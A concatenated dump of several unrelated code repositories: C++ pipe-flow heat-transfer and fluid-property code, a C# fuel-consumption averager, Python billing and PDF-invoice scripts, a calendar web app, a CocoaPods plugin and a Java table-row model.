//Checked
double FluidProperties::Liquid::Mu(FluidProperties &container)
{
//kg/(m s)
this->container = &container;
Render();
double TR = T * 9.0 / 5.0;//Rankin
double a = -3.9932*log10(TR) + 10.7408;
double ans = (Rho(container) / 1000.0)*(pow(10, pow(10, a)) - 0.7);
return(ans / 1000.0);
}
//Surface tension between gas and liquid (RR)
//Not reliable
double FluidProperties::Liquid::STG(FluidProperties &container)
{
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(pow(10, -3)*(-1.5667*pow(10, -2)*TF + 1.7666 * 10));
}
//Thermal conductivit of liquid phase
double FluidProperties::Liquid::K(FluidProperties &container)
{
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(-2.998*pow(10, -4.0)*TF + 2.0954*0.1);
}
void FluidProperties::Gas::SetContainer(FluidProperties &container)
{
this->container = &container;
}
void FluidProperties::Gas::Render(void)
{
T = container->T;
P = container->P;
}
//Checked!
double FluidProperties::Gas::Z(FluidProperties &container)
{
this->container = &container;
Render();
double gamma = MW / 28.9625;
double Ppsi = (P) / 6894.7572932;//PsiA
Ppsi = Ppsi - 14.7;//psig
return(1 / (1 + (Ppsi * 344400 * pow(10, 1.785*gamma)) /
(pow(T * 9.0 / 5.0, 3.825))));
}
//Checked
double FluidProperties::Gas::Cp(FluidProperties &container)
{
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(8.2976*0.1*TF + 2.2822 * 1000);
}
//Checked
double FluidProperties::Gas::Rho(FluidProperties &container) // [kg / m3]
{//[J/kg/K]
this->container = &container;
double ans;
Render();
double Ppsi = P / 6894.7572932;
double R = 10.7316;//psi.ft3/mol/R
double TR = T * 9.0 / 5.0;//Rankin
ans = Z(container);
return(Ppsi*MW / (Z(container)*R*TR) / 62.4279606 * 1000);
}
//Not prefered, use RhoG instead
double FluidProperties::Gas::Rho2(FluidProperties &container)
{
this->container = &container;
Render();
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(-4.3*0.01*TF + 2.23 * 10);
}
//Checked
double FluidProperties::Gas::Mu(FluidProperties &container)
{//[kg/(m s)]
this->container = &container;
Render();
double TR = T * 9.0 / 5.0;//Rankin
double X = 3.448 + 986.4 / (TR)+0.01009*MW;
double Y = 2.447 - 0.2224*X;
double K = (9.379 + 0.01607*MW)*pow(TR, 1.5) / (209.2 + 19.26*MW + TR);
double ans = pow(10, -7.0)*K*exp(X*pow(Rho(container)*0.001, Y));
return(ans);
}
double FluidProperties::Gas::K(FluidProperties &container)
{
double TF = (9.0 / 5.0)*(T - 273.15) + 32;
return(5.963*pow(10, -5)*TF + 3.2221*0.01);
}
}//usr
<file_sep>/*In this cpp file, different fluid properties are
calculated based on temperature and pressure*/
//Glycol properties are not included
//Properties of gas and oil are listed here
#include "StratifiedFlowGeometry.h" //It provides hydraulic parameters of both phases
#include "CaseSpecificInputs.h" //Pipe and fluid properties
#include <iostream>
#include <cmath>
using namespace std;
SFConstWallTemp::SFConstWallTemp(double Length, double SuperVelocityGas,
double SuperVelocityLiquid, double LiqHoldUp,
double TempWall, double TempInlet, double Pressure)
{
L = Length, TW = TempWall; TLI = TempInlet; VSG = SuperVelocityGas;
VSL = SuperVelocityLiquid; P = Pressure; h = LiqHoldUp;
}
void SFConstWallTemp::Liquid::SetContainer(SFConstWallTemp &container)
{
this->container = &container;
}
void SFConstWallTemp::Liquid::Render(void)
{
VSL = container->VSL;
L = container->L;
TW = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstWallTemp::Liquid::Nu(double T, SFConstWallTemp &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double Rho = Properties.Liquid.Rho(Properties);
double Mu = Properties.Liquid.Mu(Properties);
double Cp = Properties.Liquid.Cp(Properties);;
double K = 0.15;//For now ******
double VS = VSL / h;
double Re = dL * VS*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstWallTemp::Liquid::TempProfile(SFConstWallTemp &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
double X = L / 200.0;
double hAverage;
double NuL;
double T = TLI;
double CP;
double RHO;
double SL = FlowGeo.SLTilt*ID;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double W;
double TLO = T - 5;//Initial guess
double F, Fdx, Fprime;
double dx = 0.0000001;
double Eps = 10;
for (int i = 0; i < 200; i++) {
//This while basically does NR
while (Eps > 10E-12) {
FluidProperties Properties(T, P);
CP = Properties.Liquid.Cp(Properties);
RHO = Properties.Liquid.Rho(Properties);
W = (VSL / h)*AL*RHO;
NuL = Nu(T, container);
hAverage = NuL * 0.15 / dL;
F = hAverage * SL*X*((TW - T) - (TW - TLO)) / log((TW - T) /
(TW - TLO)) - W * CP*(TLO - T);
Eps = F;
Fdx = hAverage * SL*X*((TW - T) - (TW - (TLO + dx))) /
log((TW - T) / (TW - (TLO + dx))) - W * CP*((TLO + dx) - T);
Fprime = (Fdx - F) / dx;
TLO = TLO - F / Fprime;
}
T = TLO;
cout << TLO << endl;
TLO = T - 1;
Eps = 10;
}
return(TLO);
}
void SFConstWallTemp::Gas::SetContainer(SFConstWallTemp &container)
{
this->container = &container;
}
void SFConstWallTemp::Gas::Render(void)//
{
VSG = container->VSG;
L = container->L;
TW = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstWallTemp::Gas::Nu(double T, SFConstWallTemp &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double Rho = Properties.Gas.Rho(Properties);
double Mu = Properties.Gas.Mu(Properties);
double Cp = Properties.Gas.Cp(Properties);
double K = 0.035854;//For now ******
double VG = VSG / h;
double Re = dG * VG*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstWallTemp::Gas::TempProfile(SFConstWallTemp &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
double X = L / 200.0;
double hAverage;
double NuG;
double T = TLI;
double CP;
double RHO;
double SG = FlowGeo.SGTilt*ID;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double W;
double TLO = T - 5;//Initial guess
double F, Fdx, Fprime;
double dx = 0.0000001;
double Eps = 10;
for (int i = 0; i < 200; i++) {
//This while basically does NR
while (Eps > 10E-12) {
FluidProperties Properties(T, P);
CP = Properties.Gas.Cp(Properties);
RHO = Properties.Gas.Rho(Properties);
W = (VSG / h)*AG*RHO;
NuG = Nu(T, container);
hAverage = NuG * 0.15 / dG;
F = hAverage * SG*X*((TW - T) - (TW - TLO)) / log((TW - T) /
(TW - TLO)) - W * CP*(TLO - T);
Eps = F;
Fdx = hAverage * SG*X*((TW - T) - (TW - (TLO + dx))) /
log((TW - T) / (TW - (TLO + dx))) - W * CP*((TLO + dx) - T);
Fprime = (Fdx - F) / dx;
TLO = TLO - F / Fprime;
}
T = TLO;
cout << TLO << endl;
TLO = T - 1;
Eps = 10;
}
return(TLO);
}
SFConstHeatFlux::
SFConstHeatFlux(double Length, double SuperVelocityGas,
double SuperVelocityLiquid, double LiqHoldUp,
double InitialTempWall, double TempInlet, double Pressure)
{
L = Length, TW = InitialTempWall; TLI = TempInlet; VSG = SuperVelocityGas;
VSL = SuperVelocityLiquid; P = Pressure; h = LiqHoldUp;
}
void SFConstHeatFlux::Liquid::SetContainer(SFConstHeatFlux &container)
{
this->container = &container;
}
void SFConstHeatFlux::Liquid::Render(void)
{
VSL = container->VSL;
L = container->L;
TWI = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstHeatFlux::Liquid::Nu(double T, SFConstHeatFlux &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double Rho = Properties.Liquid.Rho(Properties);
double Mu = Properties.Liquid.Mu(Properties);
double Cp = Properties.Liquid.Cp(Properties);;
double K = 0.15;//For now ******
double VS = VSL / h;
double Re = dL * VS*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstHeatFlux::Liquid::TempProfile(SFConstHeatFlux &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
//This is one of the assumptions of constant heat flux approach
double ConstTwTo = TWI - TLI;
double X = L / 200.0;
double hAverage;
double NuL;
double T = TLI;
double AL = (FlowGeo.ALTilt)*ID*ID;
double dL = pow(AL * 4 / Pi, 0.5);
double TW = TWI;
double CP;
double RHO;
double SL = FlowGeo.SLTilt*ID;
double W;
double ans;
for (int i = 0; i < 200; i++) {
FluidProperties Properties(T, P);
CP = Properties.Liquid.Cp(Properties);
RHO = Properties.Liquid.Rho(Properties);
W = (VSL / h)*AL*RHO;
NuL = Nu(T, container);
hAverage = NuL * 0.15 / dL;
ans = hAverage * SL*X*ConstTwTo / (W*CP);
// Plus sign here, I am not so sure!!
T = T + hAverage * SL*X*ConstTwTo / (W*CP);
TW = T + ConstTwTo;
cout << T << " " << TW << endl;
}
return(T);
}
void SFConstHeatFlux::Gas::SetContainer(SFConstHeatFlux &container)
{
this->container = &container;
}
void SFConstHeatFlux::Gas::Render(void)
{
VSG = container->VSG;
L = container->L;
TWI = container->TW;
TLI = container->TLI;
P = container->P;
h = container->h;
}
double SFConstHeatFlux::Gas::Nu(double T, SFConstHeatFlux &container) {
this->container = &container;
Render();
PipeGeometry PipeGeometry;
// Temp and pressure are needed for properties class
FluidProperties Properties(T, P);
StratifiedFlowGeometry FlowGeo(h);
ID = PipeGeometry.IDPipe;
double ans;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double Rho = Properties.Gas.Rho(Properties);
double Mu = Properties.Gas.Mu(Properties);
double Cp = Properties.Gas.Cp(Properties);;
double K = 0.035854;//For now ******
double VG = VSG / h;
double Re = dG * VG*Rho / Mu;
double Pr = Cp * Mu / K;
ans = 0.023*pow(Re, 0.8)*pow(Pr, 1.0 / 3.0);
return(ans);
}
double SFConstHeatFlux::Gas::TempProfile(SFConstHeatFlux &container) {
this->container = &container;
Render();
StratifiedFlowGeometry FlowGeo(h);
PipeGeometry PipeGeometry;
ID = PipeGeometry.IDPipe;
//This is one of the assumptions of constant heat flux approach
double ConstTwTo = TWI - TLI;
double X = L / 200.0;
double hAverage;
double NuG;
double T = TLI;
double AG = (FlowGeo.AGTilt)*ID*ID;
double dG = pow(AG * 4 / Pi, 0.5);
double TW = TWI;
double CP;
double RHO;
double SG = FlowGeo.SGTilt*ID;
double W;
double ans;
for (int i = 0; i < 200; i++) {
FluidProperties Properties(T, P);
CP = Properties.Gas.Cp(Properties);
RHO = Properties.Gas.Rho(Properties);
W = (VSG / h)*AG*RHO;
NuG = Nu(T, container);
hAverage = NuG * 0.15 / dG;
ans = hAverage * SG*X*ConstTwTo / (W*CP);
// Plus sign here, I am not so sure!!
T = T + hAverage * SG*X*ConstTwTo / (W*CP);
TW = T + ConstTwTo;
cout << T << " " << TW << endl;
}
return(T);
}
<file_sep>#ifndef StratifiedFlowGeometry_H
#define StratifiedFlowGeometry_H
#include<cmath>
#include <iostream>
#include "CaseSpecificInputs.h"
namespace MultiphaseTemperature {
class StratifiedFlowGeometry {
//hL should be known. hL is the height of liquid in the pipe
//Always ID is equal or larger than hL
double hL;
double Pi = 3.14159265358979;//Pi number
public:
StratifiedFlowGeometry(double h, double IDEffective);
double ID;
double A;
double hLTilt;
double SGTilt;
double SLTilt;
double SITilt;
double AGTilt;
double ALTilt;
double dL;
double dG;
double Theta;
friend class PipeGeometry;
};
}
#endif
| 52bf49442a5005ac4aba3ce1643caf9795041806 | [
"Markdown",
"C++"
] | 17 | C++ | arajamali/CPP-simulation-for-hydrodynamic-and-heat-transfer-calculations-in-Slug-flow-condition | fb0abae7afc58d9377fe64742649fc5f09cafb68 | 3f8b01e77899869860ddb0abc3cc03a700c02325 |
refs/heads/master | <file_sep>using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
namespace _29Tanken1._0
{
class Program
{
static void Main(string[] args)
{
//<NAME> 5ITN 10/12/2020
/* Opdracht:
* Ontwerp een toepassing waarmee je het gemiddelde verbruik van een wagen kan berekenen per 100 km.
* Bij elke tankbeurt noteert de gebruiker hoeveel kilometer hij gereden heeft sinds de vorige tankbeurt en
* hoeveel liter hij getankt heeft.
* Wanneer de gebruiker de waarde 0 ingeeft voor het aantal liter dan berekent het programma het gemiddelde
* verbruik.
*
* Analyse:
* VRAAG: kilometer
* VRAAG: litter
* HERHAAL als litter != 0
* BEREKEN: Aantal = Aantal + 1
* BEREKEN: Totaal = Totaal + litter
* BEREKEN: Gemiddelde = Totaal / Aantal
* VRAAG: kilometer
* VRAAG: litter
* TOON: Gemiddelde
*/
//Declarations
int kilometer, litter, aantal, totaal, gemiddelde;
//Initialisaties
aantal = 0;
totaal = 0;
//VRAAG: kilometer
Console.Write("Hoeveel kilometer heb je gereden sinds de vorige tankbeurt ");
kilometer = int.Parse(Console.ReadLine());
//VRAAG: litter
Console.Write("Hoeveel liter heb je toen getankt ");
litter = int.Parse(Console.ReadLine());
//HERHAAL als litter != 0
while (litter != 0)
{
//BEREKEN: Aantal = Aantal + 1
aantal = aantal + 1;
//BEREKEN: Totaal= Totaal + litter
totaal = totaal + litter;
//VRAAG: kilometer
Console.Write("Hoeveel kilometer heb je gereden sinds de vorige tankbeurt ");
kilometer = int.Parse(Console.ReadLine());
//VRAAG: litter
Console.Write("Hoeveel liter heb je toen getankt ");
litter = int.Parse(Console.ReadLine());
}
//BEREKEN gemiddelde
gemiddelde = totaal / aantal;
//TOON gemiddelde
Console.WriteLine($"Het gemiddelde verbruik is {gemiddelde} litter" );
//Wachten...
Console.WriteLine();
Console.Write("Druk op enter om af te sluiten");
Console.ReadLine();
}
}
}
| 5825a08170183111fc9da3647d327d9de4a8af4f | [
"C#"
] | 1 | C# | Eliasclaeys/29Tanken1.0 | 4d16b12917885347a4c38d235e3c7ce72ca46625 | 102a3637f92ec0810ca77d6ea8bb0877300688e6 |
refs/heads/main | <repo_name>janellebaguley/BandCalendar<file_sep>/db/delete_event.sql
delete from cal_event where cal_event_id = $1 and user_id = $2;<file_sep>/server/controller.js
module.exports = {
getEventsDay: async (req, res) => {
const db = req.app.get('db')
await db.get_day(day)
.then(event => res.status(200).send(event))
.catch(err => res.status(500).send(err))
},
getEventsMonth: async (req, res) => {
const db = req.app.get('db')
await db.get_events(month)
.then(event => res.status(200).send(event))
.catch(err => res.status(500).send(err))
},
addEvents: async (req, res) => {
const db = req.app.get('db')
const {title, location, start, end} = req.body
const {user_id} = req.session.user
await db.add_events(user_id, title, location, start, end)
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
editEvent: (req,res) => {
const {id} = req.params
const{title, location} = req.body
const db = req.app.get('db')
db.update_event({id, title, location})
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
searchEvent: (req, res)=> {
const db = req.app.get('db')
const {title, location} = req.body
db.search_events(title, location, group)
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
deleteEvent: (req, res) => {
const {id} = req.params
const db = req.app.get('db')
db.delete_event({id})
.then(() => res.sendstatus(200))
.catch(err => res.status(500).send(err))
},
getSessionUser: (req, res) => {
const {user} =req.session
if(user){
res.send(user)
} else {
res.send('')
}
}
}<file_sep>/db/seed.sql
CREATE TABLE cal_event (
cal_event_id SERIAL PRIMARY KEY,
user_id int references users(user_id),
cal_event_title VARCHAR(250),
cal_event_location VARCHAR(150),
cal_start date,
cal_end date
);
CREATE TABLE users (
user_id SERIAL PRIMARY KEY,
username VARCHAR(250) NOT NULL,
email VARCHAR(150) NOT NULL,
password VARCHAR(250) NOT NULL
);<file_sep>/db/get_day.sql
select * from cal_event where cal_start = $1;<file_sep>/src/Components/Calendar.js
import React, {useState, useReducer, createContext, useCallback} from "react";
import Header from './CalendarHeader';
import DayOfWeek from './DayOfWeek';
import CalendarBody from './CalendarBody';
import DailyEvent from "./DailyEvent";
import {eventScheduler} from '../dux/eventScheduler';
import {getEventsFromLocalStorage} from './Local';
// import axios from 'axios'
export const EventScheduleContext = createContext();
const initialEventSchedule = getEventsFromLocalStorage() || {};
const Calendar = () => {
const [todaysDate, setTodaysDate] = useState(new Date());
const [selectedDate, setSelectedDate] = useState(new Date());
const [eventsView, setEventsView] = useState(false);
const [eventSchedule, eventScheduleDispatch] = useReducer(eventScheduler, initialEventSchedule);
const onDateClick = useCallback((day) => {
setSelectedDate(day);
setEventsView(true);
}, []);
// const getEvents = () => {
// axios.get('/api/events', {todaysDate, eventsView})
// .then(() => {
// setTodaysDate(new Date())
// setEventsView(true)
// })
// }
return (
<EventScheduleContext.Provider value={{eventSchedule: eventSchedule, eventScheduleDispatch: eventScheduleDispatch}}>
<div className="calendar">
<Header currentMonth={selectedDate} setCurrentMonth={setSelectedDate}/>
<DayOfWeek />
<CalendarBody currentMonth={selectedDate} todaysDate={todaysDate} onDateClick={onDateClick}/>
{eventsView &&
<DailyEvent selectedDate={selectedDate} setEventsView={setEventsView} />
}
</div>
</EventScheduleContext.Provider>
);
};
export default Calendar; | 122ca231e35f57c0da2065331b0d7fd02f9a02a4 | [
"JavaScript",
"SQL"
] | 5 | SQL | janellebaguley/BandCalendar | 4638d2f5d1d155d19f19afa7129f9a256205e5f0 | 837b092cc1e652269fef6a689f0bbad12db5eade |
refs/heads/master | <repo_name>lyakhovenko/mobile<file_sep>/LR3/LR3.py
from datetime import datetime
import csv
from fpdf import FPDF
PDF_FILE = 'payment.pdf'
def pdf_common_line(pdf, font_size, text):
pdf.write(font_size / 2, text)
pdf.ln(font_size / 2)
def create_pdf(bank_name, inn, kpp, bik, recipient, account_number1, account_number2, doc_number, date, provider,
customer, reason):
header = [['Банк получателя: ' + bank_name, 'БИК: ' + bik],
["ИНН: " + inn + " " + "КПП: " + kpp, 'Сч. №' + account_number1],
['Получатель: ' + recipient, 'Сч. №' + account_number2]]
pdf = FPDF()
pdf.add_page()
pdf.add_font('DejaVu', '', 'DejaVuSansCondensed.ttf', uni=True)
pdf.add_font('DejaVu', 'B', 'DejaVuSansCondensed-Bold.ttf', uni=True)
pdf.set_font('DejaVu', '', 12)
col_width = pdf.w / 2.2
row_height = pdf.font_size
spacing = 2
for row in header:
for item in row:
pdf.cell(col_width, row_height * spacing,
txt=item, border=1)
pdf.ln(row_height * spacing)
font_size = 16
pdf.set_font('DejaVu', 'B', font_size)
pdf.ln(font_size / 2)
pdf_common_line(pdf, font_size, "Счёт на оплату №{} от {}г.".format(doc_number, date))
pdf_common_line(pdf, font_size, "_" * 74)
font_size = 12
pdf.ln(font_size)
pdf.set_font('DejaVu', '', font_size)
pdf_common_line(pdf, font_size, "Поставщик")
pdf_common_line(pdf, font_size, "(Исполнитель): {}".format(provider))
pdf_common_line(pdf, font_size, "")
pdf_common_line(pdf, font_size, "Покупатель")
pdf_common_line(pdf, font_size, "(Заказчик): {}".format(customer))
pdf_common_line(pdf, font_size, "")
pdf_common_line(pdf, font_size, "Основание: {}".format(reason))
pdf_common_line(pdf, font_size, "")
font_size = 10
row_height = pdf.font_size
pdf.set_font('DejaVu', '', font_size)
table = [['№', "Товары (работы, услуги)", "Кол-во", "Ед.", "Сумма"]]
counter = 1
table.append([str(counter), "Звонок {} мин. ".format(number),"{} шт.".format(minut_call), "{} руб.".format(1), "{} руб.".format(minut_call)])
counter += 1
table.append([str(counter), "SMS для {}".format(number), "{} шт.".format(sms), "{} руб.".format(s), "{} руб.".format(coat_sms)])
counter += 1
table.append([str(counter), "Интернет трафик (за МБ)", "{} МБ".format(Q+1000), "{} руб.".format(k2),
"{} руб.".format(X)])
table.append(['', "ВСЕГО", '', '', "{} руб.".format(sum)])
one_part = pdf.w / 18
for row in table:
pdf.cell(one_part * 1, row_height * spacing, txt=row[0], border=1) # number
pdf.cell(one_part * 8, row_height * spacing, txt=row[1], border=1) # title
pdf.cell(one_part * 2, row_height * spacing, txt=row[2], border=1) # count
pdf.cell(one_part * 2, row_height * spacing, txt=row[3], border=1) # cost per one
pdf.cell(one_part * 3, row_height * spacing, txt=row[4], border=1) # total cost
pdf.ln(row_height * spacing)
font_size = 16
pdf.set_font('DejaVu', 'B', font_size)
pdf_common_line(pdf, font_size, "Всего к оплате: {} руб.".format(sum))
pdf_common_line(pdf, font_size, "")
font_size = 8
pdf.set_font('DejaVu', '', font_size)
pdf_common_line(pdf, font_size, "HELLO!")
pdf_common_line(pdf, font_size,
"Оплата данного счёта означает согласие с условиями поставки товара/предоставления услуг.")
pdf_common_line(pdf, font_size, "")
font_size = 16
pdf.set_font('DejaVu', 'B', font_size)
pdf.ln(font_size / 2)
pdf_common_line(pdf, font_size, "_" * 74)
font_size = 12
pdf.set_font('DejaVu', '', font_size)
pdf.ln(font_size / 2)
pdf_common_line(pdf, font_size, "Руководитель " + "_" * 20 + " " * 25 + "Бухгалтер " + "_" * 20)
pdf.output(name=PDF_FILE, dest='F').encode('utf-8')
if __name__ == "__main__":
print("== Payment document ==")
list_1 = []
with open('data.csv') as data_file:
reader = csv.reader(data_file)
for a in reader:
list_1.append(a)
number = '915783624'
k1 = 1
s = 5
minut_call = 0.0
coat_sms = 0
for i in range(9):
if number in list_1[i][1]:
if float(list_1[i][3]) > 10:
minut_call += float(list_1[i][3]) - 10.0
coat_sms += float(list_1[i][4])
else:
coat_sms += float(list_1[i][4])
minut_call = round(minut_call, 2)
sms = coat_sms
coat_sms = coat_sms * s
minut_call = minut_call * k1
list_2 = []
with open('dataset.csv') as data_file:
reader = csv.reader(data_file)
for a in reader:
list_2.append(a)
k2 = 0.5
limit = 1000
address = '192.168.250.39'
Q = 0.0
i = 0
for i in range(17449):
if address in list_2[i][3]:
Q += float(list_2[i][12])
Q -= 1000
X = Q * k2
sum = X * 1.2 + minut_call * 1.2 + coat_sms * 1.2
nds = sum * 0.2
print("Creating PDF file...")
create_pdf(bank_name="<NAME>", inn='123456173', kpp='00001238', bik='666666', \
recipient="JULILIY", account_number1="1234591", account_number2="1378923", \
doc_number="1", date=datetime.now().strftime("%d.%m.%Y"), \
provider="ООО СВЯЗЬ", customer="JULILIY ({}, {})".format(address, number), reason="ДОЛГ!")
<file_sep>/LR3/README.MD
Лабораторная работа №3. Вариант 14
Для корректного запуска LR3.py в одной папке с программой должен находится файл с исходными данными (dataset.csv, data.csv) и два файла формата true tipe шрифтов (предствалены в репозитории). Также необходимо программное обеспечение, поддерживающее ЯП python выше 3.
Контакты: <EMAIL>
<file_sep>/LR1/LR1.py
import csv
list_1 = []
with open('data.csv') as data_file:
reader = csv.reader(data_file)
for a in reader:
list_1.append(a)
number = '915783624'
k = 1
s = 5
minut_call = 0.0
coat_sms = 0
for i in range(9):
if number in list_1[i][1]:
if float(list_1[i][3]) > 10:
minut_call += float(list_1[i][3])-10.0
coat_sms += float(list_1[i][4])
else:
coat_sms += float(list_1[i][4])
minut_call = round(minut_call, 2)
out = open('output.txt', 'w')
print(str(coat_sms*s), str(k*minut_call), file = out)
data_file.close
out.close<file_sep>/LR2/Readme.md
Лабораторная работа №2. Вариант 14
Для корректного запуска LR2.py в одной папке с программой должен находится файл с данными трафика (dataset.csv).
Также необходимо программное обеспечение, поддерживающее ЯП python выше 3.
Контакты: <EMAIL>
<file_sep>/LR2/LR2.py
import csv
import matplotlib.pyplot as plt
list_1 = []
with open('dataset.csv') as data_file:
reader = csv.reader(data_file)
for a in reader:
list_1.append(a)
k = 0.5
limit = 1000
address = '192.168.250.39'
Q = 0.0
x = []
y = []
for i in range(17449):
if address in list_1[i][3]:
Q += float(list_1[i][12])
x.append(float(list_1[i][2]))
y.append(float(list_1[i][12]))
Q -= 1000
X = Q*k
out = open('output.txt', 'w')
print(X, file = out)
data_file.close
out.close
x.sort()
y.sort()
assert len(x) == len (y)
plt.plot(x, y)
plt.grid(True)
plt.show()
<file_sep>/LR1/Readme.md
Лабораторная работа №1. Вариант 14
Для корректного запуска LR1.py в одной папке с программной должен находится файл с данными (data.csv).
Также необходимо ПО, поддерживающая ЯП python выше 3.
Контакты: <EMAIL>
| 6fac3891fea400c98b967f3545ae2cdc6de306db | [
"Markdown",
"Python"
] | 6 | Python | lyakhovenko/mobile | 9df0441c6df201908804843d36fee215060f5b5a | a2f9461cd5b373aff772f7581b8904747d8a1b89 |
refs/heads/master | <repo_name>kArTeL/cocoapods-keys<file_sep>/lib/plugin.rb
require 'cocoapods-core'
module CocoaPodsKeys
class << self
def setup
require 'preinstaller'
PreInstaller.new(user_options).setup
# move our podspec in to the Pods
`mkdir Pods/CocoaPodsKeys` unless Dir.exists? "Pods/CocoaPodsKeys"
podspec_path = File.join(__dir__, "../templates", "Keys.podspec.json")
`cp "#{podspec_path}" Pods/CocoaPodsKeys`
# Get all the keys
local_user_options = user_options || {}
project = local_user_options.fetch("project") { CocoaPodsKeys::NameWhisperer.get_project_name }
keyring = KeyringLiberator.get_keyring_named(project) || KeyringLiberator.get_keyring(Dir.getwd)
raise Pod::Informative, "Could not load keyring" unless keyring
# Create the h & m files in the same folder as the podspec
key_master = KeyMaster.new(keyring)
interface_file = File.join("Pods/CocoaPodsKeys", key_master.name + '.h')
implementation_file = File.join("Pods/CocoaPodsKeys", key_master.name + '.m')
File.write(interface_file, key_master.interface)
File.write(implementation_file, key_master.implementation)
# Add our template podspec
if user_options["target"]
# Support correct scoping for a target
target = podfile.root_target_definitions.map(&:children).flatten.find do |target|
target.label == "Pods-" + user_options["target"].to_s
end
if target
target.store_pod 'Keys', :path => 'Pods/CocoaPodsKeys/'
else
puts "Could not find a target named '#{user_options["target"]}' in your Podfile. Stopping Keys.".red
end
else
# otherwise let it go in global
podfile.pod 'Keys', :path => 'Pods/CocoaPodsKeys/'
end
end
private
def podfile
Pod::Config.instance.podfile
end
def user_options
options = podfile.plugins["cocoapods-keys"]
# Until CocoaPods provides a HashWithIndifferentAccess, normalize the hash keys here.
# See https://github.com/CocoaPods/CocoaPods/issues/3354
options.inject({}) do |normalized_hash, (key, value)|
normalized_hash[key.to_s] = value
normalized_hash
end
end
end
end
module Pod
class Installer
alias_method :install_before_cocoapods_keys!, :install!
def install!
CocoaPodsKeys.setup if validates_for_keys
install_before_cocoapods_keys!
end
def validates_for_keys
Pod::Config.instance.podfile.plugins["cocoapods-keys"] != nil
end
end
end
| e3bd5bd2abb93ea67fa3c4c55d39051015b36621 | [
"Ruby"
] | 1 | Ruby | kArTeL/cocoapods-keys | 9b2c16d1f3a7e2335bb0bc1a8bdc26e39f73473a | b1de67a1d47bcecdbe0614f9cf770b74f145c911 |
refs/heads/master | <repo_name>martinrzg/Project_Portfolio_Evaluation_Tool<file_sep>/src/models/NPVRow.java
package models;
import com.jfoenix.controls.datamodels.treetable.RecursiveTreeObject;
import javafx.beans.property.SimpleDoubleProperty;
import javafx.beans.property.SimpleIntegerProperty;
/**
* Created by <NAME> on 4/22/2017.
*/
public class NPVRow extends RecursiveTreeObject<NPVRow> {
SimpleIntegerProperty period;
SimpleDoubleProperty outflow;
SimpleDoubleProperty inflow;
SimpleDoubleProperty netCashFlow;
SimpleDoubleProperty netPresentValue;
SimpleDoubleProperty cumulativeNPV;
public NPVRow(int period, double outflow, double inflow, double netCashFlow, double netPresentValie, double cumulativeNVP){
this.period = new SimpleIntegerProperty(period);
this.outflow = new SimpleDoubleProperty(outflow);
this.inflow = new SimpleDoubleProperty(inflow);
this.netCashFlow = new SimpleDoubleProperty(netCashFlow);
this.netPresentValue = new SimpleDoubleProperty(netPresentValie);
this.cumulativeNPV = new SimpleDoubleProperty(cumulativeNVP);
}
public int getPeriod() {
return period.get();
}
public SimpleIntegerProperty periodProperty() {
return period;
}
public void setPeriod(int period) {
this.period.set(period);
}
public double getOutflow() {
return outflow.get();
}
public SimpleDoubleProperty outflowProperty() {
return outflow;
}
public void setOutflow(double outflow) {
this.outflow.set(outflow);
}
public double getInflow() {
return inflow.get();
}
public SimpleDoubleProperty inflowProperty() {
return inflow;
}
public void setInflow(double inflow) {
this.inflow.set(inflow);
}
public double getNetCashFlow() {
return netCashFlow.get();
}
public SimpleDoubleProperty netCashFlowProperty() {
return netCashFlow;
}
public void setNetCashFlow(double netCashFlow) {
this.netCashFlow.set(netCashFlow);
}
public double getNetPresentValue() {
return netPresentValue.get();
}
public SimpleDoubleProperty netPresentValueProperty() {
return netPresentValue;
}
public void setNetPresentValue(double netPresentValue) {
this.netPresentValue.set(netPresentValue);
}
public double getCumulativeNPV() {
return cumulativeNPV.get();
}
public SimpleDoubleProperty cumulativeNPVProperty() {
return cumulativeNPV;
}
public void setCumulativeNPV(double cumulativeNPV) {
